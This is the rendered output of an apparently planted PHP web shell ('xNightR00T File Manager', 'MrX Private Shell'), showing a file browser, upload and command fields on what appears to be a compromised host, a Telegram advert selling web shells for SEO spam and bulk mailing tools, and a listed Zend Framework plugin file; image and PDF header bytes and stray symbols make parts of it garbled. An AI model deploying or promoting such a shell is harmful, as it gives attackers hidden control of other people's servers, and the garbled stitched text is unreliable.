xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

	class ZF1Plugin extends ZAppsPlugin {
		
		public function resolveMVCEnter($context) {
			
		}
		
		public function resolveMVCLeave($context) {
			if (!$this->resolved) {
				$this->resolved = true;
				
				$Zend_Controller_Dispatcher_Standard = $context["this"];
				$request = $context["functionArgs"][0];
	    
				$action = $Zend_Controller_Dispatcher_Standard->getActionMethod($request);
				$className = $this->getControllerName($Zend_Controller_Dispatcher_Standard, $request);
				$module = $this->getModuleClassName($Zend_Controller_Dispatcher_Standard, $className);
				if (!$action && !$className) {
					return;
				}
				$mvc = array (  'module' => $module,
								'controller' => $className,
								'action' => $action
	                                     
	                         );
				
				$this->setRequestMVC($mvc);				
			}		
		}		
		
		private function getModuleClassName($Zend_Controller_Dispatcher_Standard, $className) {
			$moduleClassName = '';
		   
			$reflection = new \ReflectionProperty('Zend_Controller_Dispatcher_Standard', '_curModule');
			$reflection->setAccessible(true);
			$_curModule = $reflection->getValue($Zend_Controller_Dispatcher_Standard);
		 
			
			$reflection = new \ReflectionProperty('Zend_Controller_Dispatcher_Standard', '_defaultModule');
			$reflection->setAccessible(true);
			$_defaultModule = $reflection->getValue($Zend_Controller_Dispatcher_Standard);
			
			$moduleClassName = $_defaultModule;
	        	if ($_defaultModule != $_curModule) {
	        		$moduleClassName = $_curModule;
	        		if (strpos($moduleClassName, '_') > 0) {
	        			// separate the module name from controller name
	        			$moduleClassName = substr($moduleClassName, 0 , strpos($moduleClassName, '_'));
        			}
	        	}
			return $moduleClassName;
		}
		
		private function getControllerName($Zend_Controller_Dispatcher_Standard, $request) {
			/**
			 * Get controller class
			 */
			if (!$Zend_Controller_Dispatcher_Standard->isDispatchable($request)) {
				$controller = $request->getControllerName();
				if (!$Zend_Controller_Dispatcher_Standard->getParam('useDefaultControllerAlways') && !empty($controller)) {
					return "";
				}
			
				$className = $Zend_Controller_Dispatcher_Standard->getDefaultControllerClass($request);
			} else {
				$className = $Zend_Controller_Dispatcher_Standard->getControllerClass($request);
				if (!$className) {
					$className = $Zend_Controller_Dispatcher_Standard->getDefaultControllerClass($request);
				}
			}
			return $className;
		}
    
	
		private $resolved = false;
	}
	
	$zf1Plugin = new ZF1Plugin();
	$zf1Plugin->setWatchedFunction("Zend_Controller_Dispatcher_Standard::dispatch", array($zf1Plugin, "resolveMVCEnter"), array($zf1Plugin, "resolveMVCLeave"));

Filemanager

Name Type Size Permission Actions
route.php File 2.72 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1